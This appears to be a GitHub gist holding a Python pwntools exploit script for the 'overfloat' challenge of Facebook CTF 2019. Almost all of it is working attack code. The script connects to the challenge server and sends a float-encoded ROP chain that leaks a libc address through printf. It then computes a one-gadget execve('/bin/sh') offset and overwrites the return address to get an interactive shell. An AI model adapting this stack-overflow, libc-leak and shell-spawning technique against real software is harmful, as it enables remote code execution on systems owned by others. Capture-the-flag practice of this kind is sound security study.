Created
June 3, 2019 09:46
-
-
Save CreateRemoteThread/ddd98922680eb64ae00fd3a260e5432a to your computer and use it in GitHub Desktop.
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/usr/bin/python | |
import pwn | |
import binascii | |
import subprocess | |
# 9DD00 is strncmp in libc | |
# 4F440 is system in libc | |
# 0x4f2c5 execve("/bin/sh", rsp+0x40, environ) | |
# constraints: | |
# rcx == NULL | |
# 0x4f322 execve("/bin/sh", rsp+0x40, environ) | |
# constraints: | |
# [rsp+0x40] == NULL | |
# 0x10a38c execve("/bin/sh", rsp+0x70, environ) | |
# constraints: | |
# [rsp+0x70] == NULL | |
SYSTEM_OFFSET = 0x21ab0 - 0x4f2c5 | |
def phex(x): | |
x = subprocess.Popen(["./goback","%x" % x],stdout=subprocess.PIPE) | |
proc = x.stdout.readline() | |
x.wait() | |
return proc.rstrip() | |
p = pwn.remote("challenges.fbctf.com",1341) | |
# p = pwn.process("./overfloat") | |
# print "ATTACH NOW! (pid %d)" % p.pid | |
# raw_input() | |
p.recv() | |
def sendline(l): | |
global p | |
print p.recv(timeout=0.1) | |
p.send(l + "\n") | |
print "stage 1 rop go" | |
p.recv(timeout=0.5) | |
for i in range(0,11): | |
if i == 7: | |
sendline(phex(0x400a83)) # pop edi | |
sendline(phex(0x0)) | |
elif i == 8: | |
# sendline(phex(0x400abb)) | |
sendline(phex(0x602050)) # (edi = .got) | |
# sendline(phex(0x6020a8)) # (edi = .got) | |
sendline(phex(0x0)) | |
elif i == 9: # return to puts | |
# sendline(phex(0x4006c0)) # PUTS | |
sendline(phex(0x400690)) # PRINTF | |
sendline(phex(0x0)) | |
elif i == 10: # reset | |
sendline(phex(0x400749)) # actual reset for remote target. holy balls... | |
sendline(phex(0x0)) | |
else: | |
sendline(phex(0x72ff1100 + i)) | |
sendline(phex(0x44114400 + i)) | |
print "stage 1 rop catch" | |
data = p.recv() | |
sendline("done") | |
data = p.recv(timeout=0.5) | |
# print data[0:8] | |
data = p.recv(timeout=0.5) | |
print "********************" | |
l = len("BON VOYAGE!") | |
offset = data[l+1:l+7] + "\x00\x00" | |
print len(offset) | |
import struct | |
off = struct.unpack("L",offset)[0] - SYSTEM_OFFSET | |
print hex(off) | |
# p.interactive() | |
ph_part1 = (off & 0xFFFFFFFF00000000) / 0x100000000 | |
ph_part2 = off & 0xFFFFFFFF | |
print "HEXP1 = %x" % ph_part1 | |
print "HEXP2 = %x" % ph_part2 | |
# spray and pray... | |
for i in range(0,11): | |
sendline(phex(ph_part2)) | |
sendline(phex(ph_part1)) | |
sendline("done") | |
p.interactive() |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment